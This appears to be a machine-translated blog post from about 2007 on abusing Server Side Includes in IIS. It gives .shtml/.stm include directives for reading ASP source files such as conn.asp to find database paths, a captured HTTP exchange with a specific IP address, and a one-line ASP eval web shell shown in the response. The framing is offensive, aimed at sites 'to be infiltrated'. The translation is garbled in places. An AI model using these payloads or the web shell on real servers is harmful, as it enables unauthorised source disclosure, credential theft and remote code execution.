Another dangerous ISAPI extension in IIS

Let's take a look at the SSI introduction:
What is SSI used?

The reason why we need to talk about ssi is that the acronyms of shtml -- server-parsed HTML are the first letter. Contains HTML text containing commands on the embedded server. Before being sent to a browser, the server will completely read, analyze, and modify the SHTML document.

Shtml is similar to asp. Some ssi commands are used in files named after shtml, just like asp commands. You can write ssi commands in the shtml file, when the client accesses these shtml files, the server reads and interprets these SHTML files and explains the SSI commands contained in The SHTML files.

For example, you can use the SSI command in the SHTML file to reference other html files (# include). The files that the server sends to the client do not have SSI commands. It implements a function not available in HTML, that is, it can implement a dynamic SHTML. It can be said that it is an evolution of HTML. Like Sina's news system, the news content is fixed, but the advertisements and menus on it are referenced by # include.

At present, it mainly has the following usage:

1. Display Server Environment Variables <# echo>

2. Insert text content directly into the document <# include>

3. Display WEB Document Information <# flastmod # fsize> (for example, file creation date/size)

4. directly execute various programs on the server <# exec> (for example, CGI or other executable programs)

5. Set the SSI information display format <# config> (for example, file creation date/Size Display Mode). Advanced SSI <XSSI> allows you to set variables to use if condition statements.

We all know that ISAPI has many dangerous extensions by default, such:
Asp asa cer cdx can all execute ASP script code
If the program cannot upload these extensions, we can upload an stm file or shtml with the following content:
<! -- # Include file = "conn. asp" -->
Directly request this stm file or shtml file, conn. asp will be available, and the database path will be ready!

After reading the introduction of shtml, I suddenly realized that I finally understood it!
As mentioned above,
<! -- # Include file = "conn. asp" -->
Is an SSI command. Its function is to "conn. the content of asp is copied to the current page. When the visitor browses the content, the conn is displayed in the same way as other HTML documents. asp content.
I tried it locally! Create a test.shtml file under my iis with the following content:
<! -- # Include file = "OK. asp" -->
Another Trojan file named OK. asp is stored in the same directory.
In the browser, the request test.shtml is blank.
But when I checked the source code, I was so dizzy that it turned out to be the content of my asp file!
In this way, we can use this to obtain the conn file of the web to be infiltrated to obtain the database path,
However, one premise is that the server has not deleted the stm or shtml extension, and the other is that the WEB service extension "file inclusion on the server" must be enabled.

GET/test.shtml HTTP/1.1
Accept :*/*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;. net clr 1.1.4322)
Host: 221.195.40.43
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 14 Aug 2007 01:57:18 GMT
Server: Microsoft-Microsoft IIS/6.0
Content-Length: 22
Content-Type: text/html

<% Eval (request ("#") %>